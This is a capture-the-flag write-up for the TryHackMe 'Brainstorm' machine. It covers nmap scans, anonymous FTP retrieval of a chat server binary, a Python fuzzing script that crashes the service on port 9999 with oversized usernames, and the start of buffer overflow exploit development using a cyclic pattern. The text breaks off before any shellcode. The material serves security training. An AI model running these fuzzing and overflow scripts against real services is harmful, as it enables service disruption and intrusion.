Writeup Tryhackme Brainstorm
Writeup about the Tryhackme machine Brainstorm
0 - Basic info
Windows machine
1 - Reconnaissance and enumeration
Starting with nmap. This time I wasted time improving my nmap scans because were really noisy and slow.
The scan is divided in 2 parts. First a quick scan in all ports only searching open ports and dumping the data to a grep format ports.txt
nmap -p- --open -T5 -v 10.10π -n -Pn -oG ports.txt
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-03 20:00 CEST
Initiating Connect Scan at 20:00
Scanning 10.10π [65535 ports]
Discovered open port 3389/tcp on 10.10π
Discovered open port 21/tcp on 10.10π
Discovered open port 9999/tcp on 10.10π
Connect Scan Timing: About 19.35% done; ETC: 20:03 (0:02:09 remaining)
Connect Scan Timing: About 64.45% done; ETC: 20:02 (0:00:34 remaining)
Completed Connect Scan at 20:02, 88.02s elapsed (65535 total ports)
Nmap scan report for 10.10π
Host is up (0.037s latency).
Not shown: 65532 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
21/tcp open ftp
3389/tcp open ms-wbt-server
9999/tcp open abyss
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 88.15 seconds
To extract the data I use grep -oP (Perl regex format) and tr to replace string xargs to output the data in one line:
cat ports.txt | grep -oP '\d{2,5}/open' | tr '/open' ' '| xargs | tr ' ' ','
21,3389,9999
Combined with a more deep scan:
nmap -sC -sV -Pn -p$(cat ports.txt | grep -oP '\d{2,5}/open' | tr '/open' ' '| xargs | tr ' ' ',') 10.10π -oN full_scan2.txt 1 β¨―
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-03 20:45 CEST
Nmap scan report for 10.10π
Host is up (0.037s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
|_ SYST: Windows_NT
3389/tcp open ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=brainstorm
| Not valid before: 2021-07-02T17:09:32
|_Not valid after: 2022-01-01T17:09:32
|_ssl-date: 2021-07-03T18:47:40+00:00; -37s from scanner time.
9999/tcp open abyss?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie:
| Welcome to Brainstorm chat (beta)
| Please enter your username (max 20 characters): Write a message:
| NULL:
| Welcome to Brainstorm chat (beta)
|_ Please enter your username (max 20 characters):
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9999-TCP:V=7.91%I=7%D=7/3%Time=60E0B03B%P=x86_64-pc-linux-gnu%r(NUL
SF:L,52,"Welcome\x20to\x20Brainstorm\x20chat\x20\(beta\)\nPlease\x20enter\
SF:x20your\x20username\x20\(max\x2020\x20characters\):\x20")%r(GetRequest,
SF:63,"Welcome\x20to\x20Brainstorm\x20chat\x20\(beta\)\nPlease\x20enter\x2
SF:0your\x20username\x20\(max\x2020\x20characters\):\x20Write\x20a\x20mess
SF:age:\x20")%r(HTTPOptions,63,"Welcome\x20to\x20Brainstorm\x20chat\x20\(b
SF:eta\)\nPlease\x20enter\x20your\x20username\x20\(max\x2020\x20characters
SF:\):\x20Write\x20a\x20message:\x20")%r(FourOhFourRequest,63,"Welcome\x20
SF:to\x20Brainstorm\x20chat\x20\(beta\)\nPlease\x20enter\x20your\x20userna
SF:me\x20\(max\x2020\x20characters\):\x20Write\x20a\x20message:\x20")%r(Ja
SF:vaRMI,63,"Welcome\x20to\x20Brainstorm\x20chat\x20\(beta\)\nPlease\x20en
SF:ter\x20your\x20username\x20\(max\x2020\x20characters\):\x20Write\x20a\x
SF:20message:\x20")%r(GenericLines,63,"Welcome\x20to\x20Brainstorm\x20chat
SF:\x20\(beta\)\nPlease\x20enter\x20your\x20username\x20\(max\x2020\x20cha
SF:racters\):\x20Write\x20a\x20message:\x20")%r(RTSPRequest,63,"Welcome\x2
SF:0to\x20Brainstorm\x20chat\x20\(beta\)\nPlease\x20enter\x20your\x20usern
SF:ame\x20\(max\x2020\x20characters\):\x20Write\x20a\x20message:\x20")%r(R
SF:PCCheck,63,"Welcome\x20to\x20Brainstorm\x20chat\x20\(beta\)\nPlease\x20
SF:enter\x20your\x20username\x20\(max\x2020\x20characters\):\x20Write\x20a
SF:\x20message:\x20")%r(DNSVersionBindReqTCP,63,"Welcome\x20to\x20Brainsto
SF:rm\x20chat\x20\(beta\)\nPlease\x20enter\x20your\x20username\x20\(max\x2
SF:020\x20characters\):\x20Write\x20a\x20message:\x20")%r(DNSStatusRequest
SF:TCP,63,"Welcome\x20to\x20Brainstorm\x20chat\x20\(beta\)\nPlease\x20ente
SF:r\x20your\x20username\x20\(max\x2020\x20characters\):\x20Write\x20a\x20
SF:message:\x20")%r(Help,63,"Welcome\x20to\x20Brainstorm\x20chat\x20\(beta
SF:\)\nPlease\x20enter\x20your\x20username\x20\(max\x2020\x20characters\):
SF:\x20Write\x20a\x20message:\x20")%r(SSLSessionReq,63,"Welcome\x20to\x20B
SF:rainstorm\x20chat\x20\(beta\)\nPlease\x20enter\x20your\x20username\x20\
SF:(max\x2020\x20characters\):\x20Write\x20a\x20message:\x20")%r(TerminalS
SF:erverCookie,63,"Welcome\x20to\x20Brainstorm\x20chat\x20\(beta\)\nPlease
SF:\x20enter\x20your\x20username\x20\(max\x2020\x20characters\):\x20Write\
SF:x20a\x20message:\x20");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -37s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 190.20 seconds
We can see 2 intereting things, first, there is a FTP server witn anonymous login and a strange port 9999 running, a chat ?
Anyway I downloaded the files inside the FTP with the anonymous login
ftp 10.10π 127 β¨―
Connected to 10.10π.
220 Microsoft FTP Service
Name (10.10π:u915): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-29-19 08:36PM <DIR> chatserver
226 Transfer complete.
ftp> cd chatserver
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-29-19 10:26PM 43747 chatserver.exe
08-29-19 10:27PM 30761 essfunc.dll
226 Transfer complete.
Downloading the files
ftp> get chatserver.exe
local: chatserver.exe remote: chatserver.exe
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 45 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
43747 bytes received in 0.35 secs (122.8856 kB/s)
ftp> get essfunc.dll
local: essfunc.dll remote: essfunc.dll
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 32 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
30761 bytes received in 0.15 secs (194.3710 kB/s)
Note: I did this wrong, because I realized that I downloaded the files in text mode (ASCII mode) and not in binary mode… I came back to this after getting stuck for a while because I could not run the .exe file
Before downloading the files set the file type to binary:
ftp> bin
200 Type set to I.
At this point is clear that maybe we got the same executables running on the port 9999, so we can debug and study the executables to try to exploit the chat service.
Lets interact with the chat service
nc 10.10π 9999
Welcome to Brainstorm chat (beta)
Please enter your username (max 20 characters): u915
Write a message: ok
Sat Jul 03 12:02:11 2021
u915 said: ok
Looks like we can use 2 “strings” to test if it is vulnerable, the username and the message.
Note: Warning, for some reason the question (How many ports are open?) the valid answer is not 3. I “bruteforce” the answer and the valid answer is 6, don’t tell me why, because I tested a lot of scans and I always get the same open ports.
2 - Vulnerability Identification
Studying in detail the .exe file and dll obtained from the FTP server on another Windows machine.
I used the same windows 7 tryhackme machine for the stack buffer overflow preparation.
xfreerdp /u:admin /p:password /cert:ignore /v:MACHINE_IP /workarea
I did a custom python script to buff the username, after a bit of tunning the script looks like this:
#!/bin/python3
from pwn import *
HOST = "10.10π"
PORT = "9999"
LIMIT = 60
CHARS_FUZZ = 500
for x in range (1,LIMIT):
r = remote(HOST,PORT)
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
print("[+] SENDING USERNAME"+str(CHARS_FUZZ*x)+" CHARS, COUNTER:"+str(x))
r.send("A"*CHARS_FUZZ*x+"\r\n")
r.clean()
print("[+] SENDING CHAT")
r.send("Ok\r\n")
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
if (r.recvline(timeout=4))==b'':
print("[!] KO CHAT")
r.close()
break
r.clean()
r.close()
Started to buzz in chunks of 500 chars:
python3 fuzz1.py
[+] Opening connection to 10.10π on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME500 CHARS, COUNTER:1
[+] SENDING CHAT
b'\n'
b'\n'
b'Sat Jul 03 16:13:07 2021\n'
[*] Closed connection to 10.10π port 9999
[+] Opening connection to 10.10π on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME1000 CHARS, COUNTER:2
[+] SENDING CHAT
b'\n'
b'\n'
b'Sat Jul 03 16:13:09 2021\n'
[*] Closed connection to 10.10π port 9999
[+] Opening connection to 10.10π on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME1500 CHARS, COUNTER:3
[+] SENDING CHAT
b'Write a message: \n'
b'\n'
b'Sat Jul 03 16:13:10 2021\n'
[*] Closed connection to 10.10π port 9999
[+] Opening connection to 10.10π on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME2000 CHARS, COUNTER:4
[+] SENDING CHAT
b'\n'
b'\n'
b'Sat Jul 03 16:13:11 2021\n'
[*] Closed connection to 10.10π port 9999
[+] Opening connection to 10.10π on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME2500 CHARS, COUNTER:5
[+] SENDING CHAT
b'\n'
b'\n'
b'Sat Jul 03 16:13:13 2021\n'
[*] Closed connection to 10.10π port 9999
[+] Opening connection to 10.10π on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME3000 CHARS, COUNTER:6
[+] SENDING CHAT
b'\n'
b'\n'
b'Sat Jul 03 16:13:14 2021\n'
[*] Closed connection to 10.10π port 9999
[+] Opening connection to 10.10π on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME3500 CHARS, COUNTER:7
[+] SENDING CHAT
b'\n'
b'\n'
b'Sat Jul 03 16:13:15 2021\n'
[*] Closed connection to 10.10π port 9999
[+] Opening connection to 10.10π on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME4000 CHARS, COUNTER:8
[+] SENDING CHAT
b'\n'
b'\n'
b'Sat Jul 03 16:13:17 2021\n'
[*] Closed connection to 10.10π port 9999
[+] Opening connection to 10.10π on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME4500 CHARS, COUNTER:9
[+] SENDING CHAT
b'\n'
b'\n'
b'Sat Jul 03 16:13:18 2021\n'
[*] Closed connection to 10.10π port 9999
[+] Opening connection to 10.10π on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME5000 CHARS, COUNTER:10
[+] SENDING CHAT
b''
b''
b''
[!] KO CHAT
[*] Closed connection to 10.10π port 9999
The server crashes beetwen 4500 and 5000 chars
So the server is vulnerable to a bufferoverflow attack. At leats we can shutdown the service π
3 - Exploit development
Started creating a pattern of 5000 chars:
msf-pattern_create -l 5000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk
Using the pattern with another version of the previous python script to trigger the bufferoverflow, this time with Inmunity debugger atached to study the .exe executable:
#!/bin/python3
from pwn import *
HOST = "10.10π"
PORT = "9999"
LIMIT = 60
CHARS_FUZZ = 500
payload = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2C